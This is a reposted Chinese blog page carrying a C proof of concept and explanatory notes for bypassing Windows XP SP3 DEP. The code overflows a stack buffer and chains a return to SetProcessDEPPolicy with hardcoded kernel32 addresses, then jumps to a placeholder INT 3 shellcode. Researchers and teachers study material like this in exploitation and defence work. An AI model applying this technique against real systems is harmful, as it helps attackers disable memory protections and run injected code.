[zz]DEP bypass with SetProcessDEPPolicy()

最新推荐文章于 2023-06-03 12:22:53 发布
转载 最新推荐文章于 2023-06-03 12:22:53 发布 · 246 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/moonflow/archive/2012/05/31/2529153.html
文章标签:

#c/c++

本文介绍了一个利用SetProcessDEPPolicy函数绕过Windows XP SP3上的数据执行保护(DEP)的攻击方法。通过修改缓冲区并调用该函数,可以关闭DEP,使运行的进程不受硬件强制的NX/XD位约束。文章详细阐述了函数的使用方式,包括参数设置和栈上布局,以及在不同系统补丁级别下的适应性调整。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. /*
  2. This is a proof of concept of buffer overflow exploitation with DEP
  3. bypass on Windows XP Professional SP3 english updated on December 9,
  4. 2009 with DEP manually set to OptOut so enabled for all processes,
  5. except the ones that are put in the exception list and this program
  6. is not.
  7.  
  8. This source has been compiled with Microsoft Visual C++ 2008 Express
  9. Edition in Release mode with the default flags. This includes
  10. /NXCOMPAT and /GS.
  11.  
  12. Buffer Security Check (stack cookie, /GS flag) does not need to be
  13. bypassed because the string buffer, buf, in this example is long
  14. 4 bytes, so the compiler does not add the GS cookie to the
  15. useSetProcessDEPPolicy() function. Remember that strict_gs_check
  16. pragma by default is turned off.
  17.  
  18. References:
  19. * 'New NX APIs added to Windows Vista SP1, Windows XP SP3 and Windows
  20.   Server 2008' by Michael Howard,
  21.   http://blogs.msdn.com/michael_howard/archive/2008/01/29/new-nx-apis-added-to-windows-vista-sp1-windows-xp-sp3-and-windows-server-2008.aspx
  22. * SetProcessDEPPolicy Function,
  23.   http://msdn.microsoft.com/en-us/library/bb736299%28VS.85%29.aspx
  24.  
  25. Feel free to write me for comments and questions,
  26. Bernardo Damele A. G. <bernardo.damele@gmail.com>
  27. */
  28.  
  29.  
  30. #include <windows.h>
  31. #include <stdlib.h>
  32.  
  33.  
  34. void useSetProcessDEPPolicy()
  35. {
  36.     char buf[4];
  37.  
  38.     /* Overflow the string buffer and EBP register. */
  39.     strcpy(buf, "AAAABBBB");
  40.  
  41.     /* SetProcessDEPPolicy() API has been added to Windows Vista SP1,
  42.     Windows XP SP3 and Windows Server 2008 and can be abused by an
  43.     attacker while exploiting a buffer overflow vulnerability to disable
  44.     hardware-enforced DEP (NX/XD bit) for the running process.
  45.  
  46.     Overwrite EIP with the address of SetProcessDepPolicy() API, which
  47.     is 0x7c8622a4 on a Windows XP SP3 English 32bit system updated on
  48.     December 9, 2009.
  49.  
  50.     NOTE: You might need to adapt it depending on your system patch
  51.     level. */
  52.     memcpy(buf+8, "\xa4\x22\x86\x7c", 4);
  53.  
  54.     /* Return address of SetProcessDepPolicy().
  55.     Use an address of a JMP ESP instruction in kernel32.dll to jump to our
  56.     shellcode on the top of the stack.
  57.  
  58.     NOTE: You might need to adapt it depending on your system patch
  59.     level. */
  60.     memcpy(buf+12, "\x13\x44\x87\x7c", 4);
  61.  
  62.     /* Argument for SetProcessDepPolicy().
  63.     0x00000000 turn off DEP for this process. */
  64.     memcpy(buf+16, "\x00\x00\x00\x00", 4);
  65.  
  66.     /* The shellcode to be executed after DEP has been disabled.
  67.     For instance, a breakpoint (INT 3 instruction) to call the
  68.     debug exception handler which will pause the process. */
  69.     memcpy(buf+20, "\xcc", 1);
  70. }
  71.  
  72.  
  73. int main()
  74. {
  75.     useSetProcessDEPPolicy();
  76.  
  77.     return 0;
  78. }
     
    利用SetProcessDEPPolicy来关闭DEP
    适用在:Windows XP SP3,Vista SP1 和Windows 2008。
    为了能使这个函数有效,当前的DEP 策略必须设成OptIn 或者OptOut。如果策略被设成
    AlwaysOn(或者AlwaysOff),然后SetProcessDEPPolicy 将会抛出一个错误。如果一个模块
    是以/NXCOMPAT 链接的,这个技术也将不会成功。最后,同等重要的是,它这能被进程调
    用一次。因此如果这个函数已经被当前进程调用(如IE8,当程序开始时已经调用它),它
    将不成功。
    Bernardo Damele 写了一篇关于这一技术的博文:
    http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html
    函数原型如下:
    BOOLWINAPI SetprocessDEPPolicy(
      __in DWORD dwFlags
    );
    这个函数需要一个参数,并且这个参数必须设置为0,以此禁用当前进程的DEP。
    为了在ROP 链中使用这个函数,你需要在栈上这样设置:
    ●指向SetProcessDEPPolicy 的指针
    ●指向shellcode 的指针
    ●0
    指向shellcode 的指针用于确保当SetProcessDEPPolicy()执行完ROP链后会跳到shellcode。
    在XP SP3 下SetProcessDEPPolicy 的地址是7C8622A4(kernel32.dll)
    http://bernardodamele.blogspot.com/2009/12/dep-bypass-with-setprocessdeppolicy.html

转载于:https://www.cnblogs.com/moonflow/archive/2012/05/31/2529153.html

DEP Bypass - ROP
Wonderful
05-24 843
DEP Bypass - ROP
DEP和ASLR的原理与破解
wangjiabin2007的专栏
07-10 6325
DEP原理就是在系统的内存页中设置了一个标志位,标示这个内存页的属性(可执行),硬件和系统级支持。 ASLR 原理同一个程序运行时,其相同模块的加载地址是随机的,不是固定在某个地址上。 DEP的绕过(破解)方法。
XP、windows2003下提示找不到SetProcessDEPPolicy
weolar的专栏
06-03 346
SetProcessDEPPolicy和Sleep参数个数一样,而且SetProcessDEPPolicy的参数值一般也就是0或者1,我给强制传给Sleep,完全不影响exe的流程。哈哈,这办法真是天才。查了下electron和chromium的代码都没用到这个api,那应该就是crt编译的时候带进去的,可能是exe启动时候调用了一下。我直接搜索exe里的SetProcessDEPPolicy字符串,然后强制改成Sleep。
windows溢出保护原理与绕过方法概览
天元喜羊羊的博客
08-19 5704
http://bbs.pediy.com/showthread.php?p=879124#post879124 Windows溢出保护原理与绕过方法概览 V2.0 By  : riusksk(泉哥) Blog: http://riusksk.blogbus.com Data: 第1版:2010/10/26       第2版:2011/3/26   前言 从20世纪
使用Visual C++的防御功能保护你的代码
谢启东的专栏
07-18 1648
此为转贴文章,但对一些语句有修改。  使用Visual C++的防御功能保护你的代码           许多代码都是使用C和C++编写的,但遗憾的是,其中很多此类代码都有一些甚至连开发人员都不知道的安全漏洞。以任何语言编写的程序都存在可能会使其用户受到攻击的漏洞,但C和C++语言在Internet历史上占有特殊的地位,原因是它们的许多安全漏洞都源自使其大受欢迎的功能:对计
Windows溢出保护原理与绕过方法概览
weixin_34262482的博客
05-09 521
By : riusksk(泉哥) Blog: http://riusksk.blogbus.com Data: 2011/3/26 前言 从20世纪80年×××始,在国外就有人开始讨论关于溢出的***方式。但是在当时并没有引起人们的注意,直至后来经一些研究人员的披露后,特别是著名***杂志Phrack上面关于溢出的经典文章,引领许多人步入溢出研究的行列,从此...
delphi 中关闭进程
lenovo455的专栏
11-04 1261
delphi 中关闭进程。代码如下 function KillTask(ExeFileName: string): boolean; const   PROCESS_TERMINATE = $0001; var   ContinueLoop: BOOLean;   FSnapshotHandle: THandle;   FProcessEntry32: TProcessEntry
EAS中DEP的一些解决方案,含DEP脚本(供应链)
05-31
EAS中DEP的一些解决方案,含DEP脚本(供应链) EAS(Enterprise Application System,企业应用系统)是基于SAP ERP的应用系统,它提供了强大的业务流程管理和自动化工具。DEP(Data Exchange Platform,数据交换...
MySQL 5.6 中TIMESTAMP with implicit DEFAULT value is deprecated错误
12-15
在MySQL 5.6中,当你遇到"TIMESTAMP with implicit DEFAULT value is deprecated"这个警告时,这表明你在数据库的表定义或数据插入语句中使用了时间戳(TIMESTAMP)字段,并且该字段没有显式地设定默认值。这种做法在...
canon ip100 driver for debian 10 and 11 with dep libs
01-30
canon ip100 linux deb was ...Some old dep libs are not available in the new debain (10, 11) or Unbantu (18, 19). In this package, libpng12-0, libtiff4 were packed as well as the deb of ip100 driver.
DepMng.rar_dep
09-21
4. 如果需要,使用`SetProcessDEPPolicy`更改DEP策略。 5. 对特定内存区域使用`VirtualProtect`设置执行权限。 6. 可能会有一个测试模块,如TEST106.txt,用于验证DEP设置是否生效和正确工作。 项目的源代码文件,...
Protecting Your Code with Visual C++ Defenses
04-03 1387
Michael Howard ContentsStack-Based Buffer Overrun Detection (/GS)Safe Exception Handling (/SafeSEH)DEP Compatibility (/NXCompat)Image Randomization (/DynamicBase)Safer Function CallsC++ Operator
使数据区“可执行”的几种常规办法
hambaga的博客
01-21 965
一、VirtualProtect 这个函数可以修改缓冲区的页面属性,传入 PAGE_EXECUTE_READWRITE 让缓冲区可执行。 BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect ); 二、SetProcessDEPPolicy 这个函数可以在运行时修改进程的DEP属性。 BOOL SetProcessDEPPolicy( DWORD
Delphi 关闭 DEP (2008/xp sp3?)
goingchan的专栏
05-07 606
DEP有时会保护了某些操作, 当进行某些类hack操作的代码时会报错!-_- 用 SetProcessDEPPolicy 可以覆盖系统的DEP设置, but似乎只限2008, xp sp3似乎也支持(待测) hk := GetModuleHandle('Kernel32.dll'); if hk INVALID_HANDLE_VALUE then begin ...
unresolved symbol @__security_check_cookie
swanabin的专栏
03-19 1166
转自VC错误:http://www.vcerror.com/?p=2137 问题描述: ntstrsafe.lib(output.obj) : error LNK2019: unresolved external symbol @__security_check_cookie@4 referenced in function __output ntstrsafe.lib(woutput.ob
数据执行保护(DEP)的基本设置
热门推荐
我本善良编程专栏
05-28 1万+
1)执行权限 必须是管理员,而且可以修改boot.ini文件2)数据执行保护DEP的几个可选参数   NOExecute=Optin (为关键Windows程序和服务启用数据执行保护)   NOExecute=Optout (除所选之外,为所有程序和服务启用数据执行保护)   NOExecute=AlwaysOff(关闭数据执行保护功能){选项处于灰色状态}   NOExecute=AlwaysOn(将整个系统置于DEP保护范围以内,所有进程将始终在应用DEP的情况下运行)3)可以通过修改BOOT.INI文
【缓冲区溢出】EasyRMtoMP3Converter.exe stack overflow bypass dep using rop tech
Catch me if you can
04-25 1714
使用rop绕过dep,关键函数setProcessDEPPolicy。 测试报告。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值